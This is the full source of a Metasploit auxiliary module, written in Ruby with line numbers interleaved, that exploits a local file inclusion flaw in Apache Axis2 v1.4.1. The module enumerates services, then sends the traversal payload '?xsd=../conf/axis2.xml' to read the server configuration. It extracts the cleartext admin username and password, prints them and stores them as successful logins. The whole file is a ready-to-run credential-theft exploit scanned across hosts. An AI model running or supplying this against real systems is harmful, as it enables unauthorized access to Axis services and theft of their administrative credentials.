1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::Scanner
10

11
  def initialize
12
    super(
13
      'Name' => 'Apache Axis2 v1.4.1 Local File Inclusion',
14
      'Description' => %q{
15
          This module exploits an Apache Axis2 v1.4.1 local file inclusion (LFI) vulnerability.
16
        By loading a local XML file which contains a cleartext username and password, attackers can trivially
17
        recover authentication credentials to Axis services.
18
      },
19
      'References' => [
20
        ['EDB', '12721'],
21
        ['OSVDB', '59001'],
22
      ],
23
      'Author' => [
24
        'Tiago Ferreira <tiago.ccna[at]gmail.com>'
25
      ],
26
      'License' => MSF_LICENSE
27
    )
28

29
    register_options([
30
      Opt::RPORT(8080),
31
      OptString.new('TARGETURI', [false, 'The path to the Axis listServices', '/axis2/services/listServices']),
32
    ])
33
  end
34

35
  def run_host(ip)
36
    uri = normalize_uri(target_uri.path)
37

38
    begin
39
      res = send_request_raw({
40
        'method' => 'GET',
41
        'uri' => uri,
42
      }, 25)
43

44
      if (res and res.code == 200)
45
        res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/)
46
        new_uri = normalize_uri("/axis2/services/#{$1}")
47
        get_credentials(new_uri)
48

49
      else
50
        print_status("#{full_uri} - Apache Axis - The remote page not accessible")
51
        return
52

53
      end
54
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
55
    rescue ::Timeout::Error, ::Errno::EPIPE
56
    end
57
  end
58

59
  def report_cred(opts)
60
    service_data = {
61
      address: opts[:ip],
62
      port: opts[:port],
63
      service_name: (ssl ? 'https' : 'http'),
64
      protocol: 'tcp',
65
      workspace_id: myworkspace_id
66
    }
67

68
    credential_data = {
69
      origin_type: :service,
70
      module_fullname: fullname,
71
      username: opts[:user],
72
      private_data: opts[:password],
73
      private_type: :password
74
    }.merge(service_data)
75

76
    login_data = {
77
      last_attempted_at: DateTime.now,
78
      core: create_credential(credential_data),
79
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
80
      proof: opts[:proof]
81
    }.merge(service_data)
82

83
    create_credential_login(login_data)
84
  end
85

86
  def get_credentials(uri)
87
    lfi_payload = "?xsd=../conf/axis2.xml"
88

89
    begin
90
      res = send_request_raw({
91
        'method' => 'GET',
92
        'uri' => "#{uri}" + lfi_payload,
93
      }, 25)
94

95
      print_status("#{full_uri} - Apache Axis - Dumping administrative credentials")
96

97
      if res.nil?
98
        print_error("#{full_uri} - Connection timed out")
99
        return
100
      end
101

102
      if (res.code == 200)
103
        if res.body.to_s.match(/axisconfig/)
104

105
          res.body.scan(/parameter\sname=\"userName\">([^\s]+)</)
106
          username = $1
107
          res.body.scan(/parameter\sname=\"password\">([^\s]+)</)
108
          password = $1
109

110
          print_good("#{full_uri} - Apache Axis - Credentials Found Username: '#{username}' - Password: '#{password}'")
111

112
          report_cred(ip: rhost, port: rport, user: username, password: password, proof: res.body)
113

114
        else
115
          print_error("#{full_uri} - Apache Axis - Not Vulnerable")
116
          return :abort
117
        end
118

119
      else
120
        print_error("#{full_uri} - Apache Axis - Unrecognized #{res.code} response")
121
        return :abort
122

123
      end
124
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
125
    rescue ::Timeout::Error, ::Errno::EPIPE
126
    end
127
  end
128
end
129

130